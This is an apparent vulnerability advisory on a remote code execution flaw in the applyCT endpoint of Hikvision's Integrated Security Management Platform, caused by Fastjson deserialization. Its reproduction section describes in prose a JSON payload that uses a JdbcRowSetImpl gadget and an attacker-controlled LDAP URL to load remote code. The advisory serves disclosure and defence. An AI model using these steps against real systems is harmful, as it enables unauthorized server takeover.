Hikvision Integrated Security Management Platform Remote Code Execution Vulnerability in applyCT Component
Vulnerability
A remote command execution vulnerability has been identified in the applyCT component of the Hikvision Integrated Security Management Platform. This vulnerability arises from the use of an outdated version of the Fastjson library, which allows for the deserialization of untrusted user input. Exploitation involves triggering Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class through an LDAP URL, an attacker can execute remote code on the underlying system.
Impact
Exploitation of this vulnerability allows for unauthorized remote code execution on the server where Hikvision Integrated Security Management Platform is running.
Reproduction
To reproduce this vulnerability, send a POST request to the '/bic/ssoService/v1/applyCT' endpoint with a JSON payload that includes the '@type' attribute set to 'java.lang.Class' and a value that references a malicious class, such as 'com.sun.rowset.JdbcRowSetImpl'. Include another parameter that specifies an LDAP URL pointing to an untrusted server. This payload will trigger the deserialization process and execute the referenced class, achieving remote code execution.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.